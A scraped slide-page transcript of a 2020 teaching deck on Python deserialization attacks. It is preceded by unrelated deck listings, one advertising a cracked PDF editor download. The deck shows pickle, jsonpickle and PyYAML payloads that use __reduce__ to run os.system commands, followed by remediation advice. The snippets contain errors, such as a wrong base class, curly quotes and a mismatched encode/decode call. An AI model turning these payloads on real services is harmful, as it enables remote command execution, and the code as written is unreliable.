Alluxio Webinar June 10, 2025 For more Alluxio Events: https://www.alluxio.io/events/ Speaker: David Zhu (Engineering Manager @ Alluxio) Storing data as Parquet files on cloud object storage, such as AWS S3, has become prevalent not only for large-scale data lakes but also as lightweight feature stores for training and inference, or as document stores for Retrieval-Augmented Generation (RAG). However, querying petabyte-to-exabyte-scale data lakes directly from S3 remains notoriously slow, with latencies typically ranging from hundreds of milliseconds to several seconds. In this webinar, David Zhu, Software Engineering Manager at Alluxio, will present the results of a joint collaboration between Alluxio and a leading SaaS and data infrastructure enterprise that explored leveraging Alluxio as a high-performance caching and acceleration layer atop AWS S3 for ultra-fast querying of Parquet files at PB scale. David will share: - How Alluxio delivers sub-millisecond Time-to-First-Byte (TTFB) for Parquet queries, comparable to S3 Express One Zone, without requiring specialized hardware, data format changes, or data migration from your existing data lake. - The architecture that enables Alluxio’s throughput to scale linearly with cluster size, achieving one million queries per second on a modest 50-node deployment, surpassing S3 Express single-account throughput by 50x without latency degradation. - Specifics on how Alluxio offloads partial Parquet read operations and reduces overhead, enabling direct, ultra-low-latency point queries in hundreds of microseconds and achieving a 1,000x performance gain over traditional S3 querying methods.

Wondershare PDFelement Pro 11.4.20.3548 Crack Free DownloadPuppy jhon

SAP Datasphere Catalog L2 (2024-02-07).pptxHimanshuSachdeva46

What is data visualization and how data visualization tool can help.pdfVarsha Nayak

An open source data visualization tool enhances this process by providing flexible, cost-effective solutions that allow users to customize and scale their visualizations according to their needs. These tools enable organizations to make data-driven decisions with complete freedom from proprietary software limitations. Whether you're a data scientist, marketer, or business leader, understanding how to utilize an open source data visualization tool can significantly improve your ability to communicate insights effectively.

Transmission Media. (Computer Networks)S Pranav (Deepu)

INTRODUCTION:TRANSMISSION MEDIA • A transmission media in data communication is a physical path between the sender and the receiver and it is the channel through which data can be sent from one location to another. Data can be represented through signals by computers and other sorts of telecommunication devices. These are transmitted from one device to another in the form of electromagnetic signals. These Electromagnetic signals can move from one sender to another receiver through a vacuum, air, or other transmission media. Electromagnetic energy mainly includes radio waves, visible light, UV light, and gamma ra

FME as an Orchestration Tool - Peak of Data & AI 2025Safe Software

Looking for a BIRT Report Alternative Here’s Why Helical Insight Stands Out.pdfVarsha Nayak

The search for an Alternative to BIRT Reports has intensified as companies face challenges with BIRT's steep learning curve, limited visualization capabilities, and complex deployment requirements. Organizations need reporting solutions that offer intuitive design interfaces, comprehensive analytics features, and seamless integration capabilities – all while maintaining the reliability and performance that enterprise environments demand.

Software Testing & it’s types (DevOps)S Pranav (Deepu)

NTRODUCTION TO SOFTWARE TESTING • Definition: • Software testing is the process of evaluating and verifying that a software application or system meets specified requirements and functions correctly. • Purpose: • Identify defects and bugs in the software. • Ensure the software meets quality standards. • Validate that the software performs as intended in various scenarios. • Importance: • Reduces risks associated with software failures. • Improves user satisfaction and trust in the product. • Enhances the overall reliability and performance of the software

UPDASP a project coordination unit ......withrj1

OpenTelemetry 101 Cloud Native BarcelonaImma Valls Bernaus

Open Source Software Development MethodsVICTOR MAESTRE RAMIREZ

Porting Qt 5 QML Modules to Qt 6 WebinarICS

Have you upgraded your application from Qt 5 to Qt 6? If so, your QML modules might still be stuck in the old Qt 5 style—technically compatible, but far from optimal. Qt 6 introduces a modernized approach to QML modules that offers better integration with CMake, enhanced maintainability, and significant productivity gains. In this webinar, we’ll walk you through the benefits of adopting Qt 6 style QML modules and show you how to make the transition. You'll learn how to leverage the new module system to reduce boilerplate, simplify builds, and modernize your application architecture. Whether you're planning a full migration or just exploring what's new, this session will help you get the most out of your move to Qt 6.

How Insurance Policy Management Software Streamlines OperationsInsurance Tech Services

What is data visualization and how data visualization tool can help.pptxVarsha Nayak

Code and No-Code Journeys: The Coverage OverlookApplitools

Who will create the languages of the future?Jordi Cabot

Will future languages be created by language engineers? Can you "vibe" a DSL? In this talk, we will explore the changing landscape of language engineering and discuss how Artificial Intelligence and low-code/no-code techniques can play a role in this future by helping in the definition, use, execution, and testing of new languages. Even empowering non-tech users to create their own language infrastructure. Maybe without them even realizing.

Emvigo Capability Deck 2025: Accelerating Innovation Through Intelligent Soft...Emvigo Technologies

Welcome to Emvigo’s Capability Deck for 2025 – a comprehensive overview of how we help businesses launch, scale, and sustain digital success through cutting-edge technology solutions. With 13+ years of experience and a presence across the UK, UAE, and India, Emvigo is an ISO-certified software company trusted by leading global organizations including the NHS, Verra, London Business School, and George Washington University. 🔧 What We Do We specialize in: Rapid MVP development (go from idea to launch in just 4 weeks) Custom software development Gen AI applications and AI-as-a-Service (AIaaS) Enterprise cloud architecture DevOps, CI/CD, and infrastructure automation QA and test automation E-commerce platforms and performance optimization Digital marketing and analytics integrations 🧠 AI at the Core Our delivery model is infused with AI – from workflow optimization to proactive risk management. We leverage GenAI, NLP, and ML to make your software smarter, faster, and more secure. 📈 Impact in Numbers 500+ successful projects delivered 200+ web and mobile apps launched 42-month average client engagement 30+ active projects at any time 🌍 Industries We Serve Fintech Healthcare Education (E-Learning) Sustainability & Compliance Real Estate Energy Customer Experience platforms ⚙️ Flexible Engagement Models Whether you're looking for dedicated teams, fixed-cost projects, or time-and-materials models, we deliver with agility and transparency. 📢 Why Clients Choose Emvigo ✅ AI-accelerated delivery ✅ Strong focus on long-term partnerships ✅ Highly rated on Clutch and Google Reviews ✅ Proactive and adaptable to change ✅ Fully GDPR-compliant and security-conscious 🔗 Visit: emvigotech.com 📬 Contact: [email protected] 📞 Ready to scale your tech with confidence? Let’s build the future, together.

Women in Tech: Marketo Engage User Group - June 2025 - AJO with AWSBradBedford3

Creating meaningful, real-time engagement across channels is essential to building lasting business relationships. Discover how AWS, in collaboration with Deloitte, set up one of Adobe's first instances of Journey Optimizer B2B Edition to revolutionize customer journeys for B2B audiences. This session will share the use cases the AWS team has the implemented leveraging Adobe's Journey Optimizer B2B alongside Marketo Engage and Real-Time CDP B2B to deliver unified, personalized experiences and drive impactful engagement. They will discuss how they are positioning AJO B2B in their marketing strategy and how AWS is imagining AJO B2B and Marketo will continue to work together in the future. Whether you’re looking to enhance customer journeys or scale your B2B marketing efforts, you’ll leave with a clear view of what can be achieved to help transform your own approach. Speakers: Britney Young Senior Technical Product Manager, AWS Erine de Leeuw Technical Product Manager, AWS

Enable Your Cloud Journey With Microsoft Trusted Partner | IFI TechIFI Techsolutions

About Certivo | Intelligent Compliance Solutions for Global Regulatory Needscertivoai

Meet You in the Middle: 1000x Performance for Parquet Queries on PB-Scale Dat...Alluxio, Inc.

Wondershare PDFelement Pro 11.4.20.3548 Crack Free DownloadPuppy jhon

SAP Datasphere Catalog L2 (2024-02-07).pptxHimanshuSachdeva46

What is data visualization and how data visualization tool can help.pdfVarsha Nayak

Transmission Media. (Computer Networks)S Pranav (Deepu)

FME as an Orchestration Tool - Peak of Data & AI 2025Safe Software

Looking for a BIRT Report Alternative Here’s Why Helical Insight Stands Out.pdfVarsha Nayak

Software Testing & it’s types (DevOps)S Pranav (Deepu)

UPDASP a project coordination unit ......withrj1

OpenTelemetry 101 Cloud Native BarcelonaImma Valls Bernaus

Open Source Software Development MethodsVICTOR MAESTRE RAMIREZ

Porting Qt 5 QML Modules to Qt 6 WebinarICS

How Insurance Policy Management Software Streamlines OperationsInsurance Tech Services

What is data visualization and how data visualization tool can help.pptxVarsha Nayak

Code and No-Code Journeys: The Coverage OverlookApplitools

Who will create the languages of the future?Jordi Cabot

Emvigo Capability Deck 2025: Accelerating Innovation Through Intelligent Soft...Emvigo Technologies

Women in Tech: Marketo Engage User Group - June 2025 - AJO with AWSBradBedford3

Enable Your Cloud Journey With Microsoft Trusted Partner | IFI TechIFI Techsolutions

Python Deserialization Attacks

1. Python Deserialization Attacks By Manmeet Singh Date - 28/04/2020

2. Contents ● Serialization Concept ● Why Deserialization tends to a vulnerability ? ● Python Modules vulnerable to Deserialization Vuln. ● Pickle Module ● JSONPickle Module ● PyYAML Module ● Remediation

3. Serialization Concept

4. Structured Data Variables Lists Strings Custom Objects Text Readable or Unreadable (Bytes) stream format

5. Why we need serialization? 1. Recovery of original Structure. 2. Minimize the bandwidth. 3. Calling of class objects.

6. ● Thick client application and desktop programs. Example : metasploit, Pycharm, Intellij IDEA etc. ● APIs. ● Mobile applications Where is Serialization getting used ?

7. Why Deserialization tends to a vulnerability ?

8. Objects of classes can be serialized… And when they get deserialized, the class objects are reformed and do it purpose.

9. Yes, Calling of any existing class method is possible .. Even os.system()

10. Do developer of serialization libraries knew this?

11. Why it was made then? Application Class A Class B def abc(): ... Dynamically working with classes

12. Python Serialization Modules Vulnerable To Deserialization Vulnerability

13. ● Pickle ● jsonpickle ● Pyyaml ● ruamel.yaml

14. Pickle Module

15. Pickling is a way to convert a python object (list, dict, etc.) into a character stream. The idea is that this character stream contains all the information necessary to reconstruct the object in another python script.

16. Serialization using pickle - pickle.dumps(Object) Deserialization using pickle - pickle.loads(stream) How to pickle and de-pickle ?

17. Byte stream ending with . (dot) Detecting use of pickle module

18. from pickle import dumps import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(dumps(payload())) How to exploit pickle deserialization ?

19. from pickle import loads loads(stream) How to exploit pickle deserialization ?

20. JSONPickle Module

21. jsonpickle will serialize complex Python objects to and from JSON.It also convert a pickled object into human readable form.

22. Serialization using jsonpickle - jsonpickle.encode(Object) Deserialization using jsonpickle - jsonpickle.decode(stream) How to jsonpickle and json de-pickle ?

23. It looks like normal JSON stream of data. Sometimes have a tag “py/” in it. Detecting use of jsonpickle module

24. from jsonpickle import encode import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(decode(payload())) How to exploit jsonpickle deserialization ?

25. from jsonpickle import decode decode(stream) How to exploit jsonpickle deserialization ?

26. PyYAML Module

27. Pyyaml python module is used to serialize objects in YAML (Yet Another Markup Language) format. So this module is used to process YAML data. ● Pyyaml version < 5.1 is directly vulnerable. (CVE-2017-18342) ● Pyyaml version >=5.1 and < 5.2 is vulnerable under certain condition. (CVE-2019-20477) ● Latest version 5.3.1 of Pyyaml is not vulnerable.

28. Serialization using pyyaml - yaml.dump(Object) Deserialization using pyyaml - yaml.load(stream) How to YAML serialize and deserialize ?

29. It will be in a YAML format. Detecting use of pyyaml/ruamel.yaml modules

30. from yaml import dump import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(dump(payload())) How to exploit pyyaml deserialization ?

31. from yaml import load load(stream) How to exploit pyyaml deserialization ?

32. Remediations For jsonpickle and pickle, Here, the general take-away would be the rule of thumb “Do not deserialize untrusted data” For Pyyaml, ● Use safe_dump() and safe_load() instead of dump() and load(). ● Use latest version of pyyaml.

33. Questions ?

Python Deserialization Attacks

Recommended

More Related Content

What's hot (20)

Similar to Python Deserialization Attacks (18)

More from NSConclave (20)

Recently uploaded (20)

Python Deserialization Attacks